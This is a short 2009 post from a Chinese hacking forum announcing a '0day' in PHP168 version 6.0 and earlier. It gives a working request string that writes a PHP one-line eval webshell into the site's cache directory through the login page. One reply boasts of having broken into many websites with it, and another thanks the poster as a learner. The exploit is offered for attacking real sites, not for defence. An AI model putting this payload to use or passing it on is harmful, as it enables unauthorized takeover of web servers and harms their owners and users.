【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [原创] 红客联盟首发PHP168 6.0及以下版本0day [打印本页]

作者: lionel 时间: 2009-9-8 00:05 标题: 红客联盟首发PHP168 6.0及以下版本0day

PHP168 6.0及以下版本漏洞

影响版本：PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。
测试语句： XU3中国红客联盟-全球最大的红客组织

?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

作者: 超超 时间: 2009-9-8 01:17

成功入侵了很多网站

作者: kwed2345 时间: 2009-9-8 08:09

新手学习谢谢分享

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)